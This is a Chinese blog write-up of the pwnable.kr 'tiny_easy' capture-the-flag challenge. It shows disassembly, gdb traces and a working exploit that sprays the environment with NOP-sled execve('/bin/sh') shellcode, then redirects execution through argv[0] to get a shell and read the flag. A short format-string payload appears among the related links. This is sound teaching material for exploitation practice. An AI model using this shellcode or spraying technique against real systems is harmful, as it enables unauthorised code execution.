【pwnable.kr】 tiny_easy

最新推荐文章于 2024-05-24 09:58:31 发布
最新推荐文章于 2024-05-24 09:58:31 发布
阅读量717 收藏
点赞数
分类专栏: Pwnable.kr

https://r00tnb.github.io/2018/02/26/pwnable.kr-tiny_easy/

前言

考验漏洞利用能力的题目,长姿势了。参考了别人的writeup

分析

没有源代码,就丢ida逆向了

1
2
3
4
5
6
7
8
9
10
11
12
13
14

LOAD:08048054 ; Attributes: noreturn
LOAD:08048054
LOAD:08048054                 public start
LOAD:08048054 start           proc near
LOAD:08048054                 pop     eax
LOAD:08048055                 pop     edx
LOAD:08048056                 mov     edx, [edx]
LOAD:08048058                 call    edx
LOAD:08048058 start           endp ; sp-analysis failed
LOAD:08048058
LOAD:08048058 LOAD            ends
LOAD:08048058
LOAD:08048058
LOAD:08048058                 end start

 

这是什么程序??就这一点代码就什么都没了?当时也很蒙蔽,不过漏洞还是很容易看出来的。call调用其实是可以通过栈内数据控制的,但是栈上的数据是什么呢?丢进gdb看看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

   0x8048050:	add    BYTE PTR [eax],dl
   0x8048052:	add    BYTE PTR [eax],al
=> 0x8048054:	pop    eax
   0x8048055:	pop    edx
   0x8048056:	mov    edx,DWORD PTR [edx]
   0x8048058:	call   edx
   0x804805a:	add    BYTE PTR [eax],al
[------------------------------------stack-------------------------------------]
0000| 0xffcf23c0 --> 0x1 
0004| 0xffcf23c4 --> 0xffcf32bb ("/root/桌面/test/tiny_easy")
0008| 0xffcf23c8 --> 0x0 
0012| 0xffcf23cc --> 0xffcf32db ("XDG_VTNR=7")
0016| 0xffcf23d0 --> 0xffcf32e6 ("XDG_SESSION_ID=c2")
0020| 0xffcf23d4 --> 0xffcf32f8 ("XDG_GREETER_DATA_DIR=/var/lib/lightdm-data/gyh")
0024| 0xffcf23d8 --> 0xffcf3327 ("CLUTTER_IM_MODULE=xim")
0028| 0xffcf23dc --> 0xffcf333d ("GPG_AGENT_INFO=/home/gyh/.gnupg/S.gpg-agent:0:1")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x08048054 in ?? ()
gdb-peda$

 

原来栈上的数据就是传入参数和环境变量的地址,接下来执行到call edx看看程序会转向哪儿。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

[----------------------------------registers-----------------------------------]
EAX: 0x1 
EBX: 0x0 
ECX: 0x0 
EDX: 0x6d6f682f ('/hom')
ESI: 0x0 
EDI: 0x0 
EBP: 0x0 
ESP: 0xffcf23c8 --> 0x0 
EIP: 0x8048058 (call   edx)
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048051:	adc    BYTE PTR [eax],al
   0x8048053:	add    BYTE PTR [eax+0x5a],bl
   0x8048056:	mov    edx,DWORD PTR [edx]
=> 0x8048058:	call   edx
   0x804805a:	add    BYTE PTR [eax],al
   0x804805c:	add    BYTE PTR [eax],al
   0x804805e:	add    BYTE PTR [eax],al
   0x8048060:	add    BYTE PTR [eax],al

 

可以看到edx的值就是第一个传入参数的前4个字节,这里是/hom。如果控制了这4个字节,就控制了程序的流程。
但是程序空间中没有调用任何函数代码,所以要getshell只有写入shellcode并跳转执行才可,程序能控制写入的地方只有环境变量和传入参数了,于是可以将shellcode写到这里面。但是题目平台是开启ASLR的,不能确定环境变量和传入参数的地址。这里可以控制程序跳转到一个大致的地址去,然后在环境变量里安排[NOP][shelcode]类似的shellcode,其中nop指令相对于shellcode要非常多,这样当程序执行跳转时一旦跳到nop覆盖的区域就会被引导至shellcode
这个大致的地址可以选取调试时见到的值如0xffcf333dshellcode可以用pwntools的shellcraft模块生成,于是exp如下

1
2

# 导入环境变量
for i in `seq 1 500`; do export A_$i=$(python -c 'print "\x90"*4096+"jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80"');done;

 

1

exec -a $(python -c "print '\x3d\x33\xcf\xff'") ./tiny_easy &

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

tiny_easy@ubuntu:~$ for i in `seq 1 500`; do export A_$i=$(python -c 'print "\x90"*4096+"jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80"');done;
tiny_easy@ubuntu:~$ exec -a $(python -c "print '\x3d\x33\xcf\xff'") ./tiny_easy &
[1] 30389
tiny_easy@ubuntu:~$ fg
-bash: fg: job has terminated
[1]+  Segmentation fault      exec -a $(python -c "print '\x3d\x33\xcf\xff'") ./tiny_easy
tiny_easy@ubuntu:~$ exec -a $(python -c "print '\x3d\x33\xcf\xff'") ./tiny_easy &
[1] 5710
tiny_easy@ubuntu:~$ exec -a $(python -c "print '\x3d\x33\xcf\xff'") ./tiny_easy &
[2] 11068
[1]   Segmentation fault      exec -a $(python -c "print '\x3d\x33\xcf\xff'") ./tiny_easy
tiny_easy@ubuntu:~$ fg
exec -a $(python -c "print '\x3d\x33\xcf\xff'") ./tiny_easy
$ ls
flag  tiny_easy
$ cat flag
What a tiny task :) good job!
$

另外,我所参考的writeup实际上还使用了ulimit -s unlimited关闭aslr的方法,但这个漏洞已经在题目平台修补了,可以参考CVE-2016-3672漏洞描述或者这篇文章

总结

该题漏洞的利用方法类似heap spray,只不过这是把shellcode布置在环境变量的节区上,该方法以前知道但是到了正真使用的时候却忘了,看来还是要多多练习呀。

TYW----子曰小玖
关注
专栏目录
pwnable.kr】 ascii_easy
子曰小玖的博客
06-06 789
https://blog.yiz96.com/pwnable-ascii_easy/ 这道题首先给出了提示”ulimit”,这里是一个可以禁用ALSR的黑科技,当设置ulimit -s unlimted时,系统的ALSR将会失效,原因在于arch/x86/mm/mmap.c中: 1 2 3 4 5 6 7 8 9...
pwnable.kr】 brainfuck
weixin_30530523的博客
08-03 148
pwnable.kr第二关第一题: ========================================= Download : http://pwnable.kr/bin/bfDownload : http://pwnable.kr/bin/bf_libc.so Running at : nc pwnable.kr 9001 =======================...
pwnable.kr ascii_easy writeup
charlie_heng的专栏
02-12 1753
兜兜转转,又回来这里刷题 这题讲真有点难度,虽然在实际比赛的时候比较少可能会出现这类题…….. 很明显可以用rop,但是rop链只能全部为ascii可见字符…..这就有点难度了 这题其实我想了好几种办法,但是实际用了只有一种,不过在这里也说下 利用rop链将ebx的值改为libc中got表的地址,然后跳转到one gadget 这个本来感觉是最快捷的办法,但是将gadget过滤掉一部分...
Pwnable.kr WP
AlexYoung28的博客
08-13 946
近期,开始将以前做的CTF的题目,全部整理一遍,写个WP,也是为了督促自己,还需要学的东西还有很多。 Pwnable.kr fd  我们首先看到这道题的C源码: 需要得到flag,则需要执行 system("/bin/cat flag"); 则 必须 buf = "LETMEWIN"。 read(fd, buf, 32)函数中的三个参数中: fd == 0时:则表示标准输入; ...
pwnable.kr fsb writeup
charlie_heng的专栏
02-12 605
打完之后看了下别人的wp…..发现我的完全是邪道……(后面又仔细看了下,发现并没有太邪道,其实也是差不多 因为用ssh登录上去执行,所以可以把输出重定向一下 /dev/null 2>&1 这样就可以避免因为传输东西太多而卡死 然后可以直接用下面payload %134520928c%14$n %20$n %134520932c%14$n %20$n 之后就可以拿到一个sh...
Tiny_C_Complier.rar_Tiny_C_Complier_tiny _tiny c++_编译原理_课程设计
09-20
Tiny C Compiler的实现与编译原理探索》 在编程世界中,编译器起着至关重要的作用,它将人类可读的高级语言转化为机器可执行的指令。本项目聚焦于 Tiny C Compiler(TCC),一个小型且高效的C语言编译器,用于...
tinyxml_2_5_3.zip_tinyxml l_tinyxml.l_tinyxml.lib_xml l_xml pars
09-21
3. `tinyxml.l` 和 `tinyxml.lib`:这两个文件可能是针对特定平台(如 Windows)的编译产物,`tinyxml.l` 可能是一个源文件或者配置文件,而 `tinyxml.lib` 是一个静态库文件,供你在链接阶段使用,以将 TinyXML 的...
tiny_exe.rar_tiny _语法分析_语法分析树_语法树
09-23
在提供的压缩包中,`tiny.exe`可能是用于执行Tiny语言编译或解释的工具,而`tiny源程序.txt`则包含了Tiny语言的源代码。用户可以通过运行`tiny.exe`并提供源代码文件来测试和执行Tiny程序,并观察语法分析和语法树...
swin_tiny_patch4_window7_224.pth
05-07
标题中的"swin_tiny_patch4_window7_224.pth"是一个预训练模型的权重文件,这在深度学习领域非常常见。Swin Transformer是近年来提出的一种基于Transformer架构的新型卷积神经网络(CNN),由卢卡斯·吴(Liang-...
TOSSIM.rar_TOSSIM_TOSSIM Tinyos-2.x_tinyos_toss
09-23
【标题】"TOSSIM.rar_TOSSIM_TOSSIM Tinyos-2.x_tinyos_toss" 提供了一个关于 TinyOS-2.x 框架中的 TOSSIM 模拟器的深入理解。TOSSIM 是一个强大的工具,用于模拟和测试 TinyOS 应用程序,特别是针对无线传感器网络...
tobj-遵循tinyobjloader精神的轻量级OBJ加载器-Rust开发
05-27
tobj-Tiny OBJ加载程序一种微型OBJ加载程序,灵感来自Syoyo出色的tinyobjloader。 旨在成为用于将OBJ文件加载到tobj的简单轻巧的选项-Tiny OBJ Loader一个小巧的OBJ加载器,灵感来自Syoyo出色的tinyobjloader。 旨在成为加载OBJ文件的一种简单而轻巧的选项,只需返回两个包含已加载的模型和材料的vecs。 所有模型均由三角形组成,OBJ文件中的任何四边形或多边形面都将转换为三角形。 请注意,仅支持可轻松转换为三角形扇形的多边形,任意多边形的行为可能不符合预期。 最好的解决方案是重新导出您的
tinyobjloader:微小但功能强大的单文件波前obj loader
01-28
tinyobjloader (不建议) 用C ++ 03编写的微小但功能强大的单文件wavefront obj loader。 除了C ++ STL外,没有任何依赖关系。 它可以用适度的内存和时间来解析超过1000万个多边形。 tinyobjloader非常适合将.obj loader嵌入到您的(全局照明)渲染器中;-) 如果您正在寻找C89版本,请参阅 。 注意! 我们已经在2016年8月20日发布了新版本v1.0.0。旧版本可以在v0.9.x分支中找到 什么是新的 2020年2月19日:存储库已移至 ! 2019年5月18日:Python绑定!(请参见python文件夹。另请参见 ) 2019年4月14日:Bump版本v2.0.0 rc0。 新的C ++ API和python绑定!(1.x API仍然存在以实现向后兼容) 2016年8月20日:Bump版本v1.0.0。 新的数据结构和API! 要求 C ++ 03编译器 旧版本 v0.9.x分支中提供了先前的旧版本。 例 tinyobjloader可以成功加载600万个三角形Rungholt场景。 OpenG
轻量级Obj加载
11-25
轻量级Obj 3D模型加载工具源码,将Obj文件解析成Index,vertex,normal工具,带例子
tinyobjloader:我找到的 tinyobjloader 的最小版本
05-29
tinyobjloader{#mycopy} 原始源代码在这里: : 用 C++ 编写的小巧但功能强大的单文件波前 obj 加载器。 除了C ++ STL外,没有任何依赖关系。 它可以在中等内存和时间的情况下解析多边形上的 10M。 适合将 .obj 加载器嵌入到您的(全局照明)渲染器中;-) 用法 std::string inputfile = "cornell_box.obj"; std::vector<tinyobj> shapes; std::vector<tinyobj> materials; std::string err = tinyobj::LoadObj(shapes, materials, inputfile.c_str()); if (!err.empty()) { std::cerr << err << st
pwnable.kr-wtf
r00tnb的博客
07-26 832
前言 一道代码很简单,但是却花了我好长时间的题目。挺有意思的,考察输入缓冲区的。 分析 还是先分析代码 #!/usr/bin/python2 import os, sys, time import subprocess from threading import Timer TIME = 5 class MyTimer(): timer=None def __i...
推荐开源项目:tinyobjloader-c —— C语言版轻量级Wavefront OBJ加载库
最新发布
gitblog_00055的博客
05-24 412
推荐开源项目:tinyobjloader-c —— C语言版轻量级Wavefront OBJ加载库 项目地址:https://gitcode.com/syoyo/tinyobjloader-c 在三维图形和游戏开发中,高效地加载和解析模型文件是至关重要的一步。今天,我们要向您推荐一个非常实用的C语言实现的开源项目:tinyobjloader-c,这是一个小巧但功能强大的头文件库,用于加载Wavef...
图形学基础 | 实现OBJ文件的载入
【黑键】
04-07 6548
在做一个软光栅化渲染器. 增加对复杂模型的支持. 选择对OBJ文件进行支持. OBJ文件格式介绍 文件格式的介绍可以参考前一篇文章 图形学基础 | 详解3D中的obj文件格式 OBJ文件载入 这里找了一个开源的OBJ文件解析的库 tinyobjloader. 只有一个头文件 tiny_obj_loader.h 主要的使用方法可以参考Github上的 loader_example.cc Demo...
图形API学习工程(19):读取obj格式模型
主要记录了工作之余胡乱学习的知识,大部分是入门级别的内容。 主要是为了自己未来有用到时能快速上手,相当于是个备忘录。 当然,也很开心其他人可以从中找到对自己有用的信息。^_^
01-01 1281
工程GIT地址:https://gitee.com/yaksue/yaksue-graphics 目标 在本篇之前,顶点数据由程序内的C++代码所硬编码,用这种方法来产生复杂的几何体并不容易。因此,我觉得是时候建立机制让程序可以读取外部的模型文件了。 模型的格式我选择 “.obj”1 ,因为它是通用的模型格式,且其内容是肉眼可读的ASCII编码。 不过我并不打算自己写obj格式的解析逻辑,而是选择使用tinyobjloader这个库。 因此,本篇的目标是: 在工程里使用tinyobjloader库实现对o
安装 tinyobjloader 报错fatal error: pybind11/pybind11.h: No such file or directory
QIU_ZHUO的博客
09-05 2883
运行pip install tinyobjloader报错fatal error: pybind11/pybind11.h: No such file or directory
model_resnet.tiny_yolo_res_body
07-28
model_resnet.tiny_yolo_res_body是一个深度学习模型中的一部分。体来说,它是一个使用ResNet作为骨干网络结构的Tiny YOLO目标检测模型的主体部分。 ResNet是一个非常流行的深度卷积神经网络结构,通过使用残差块...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值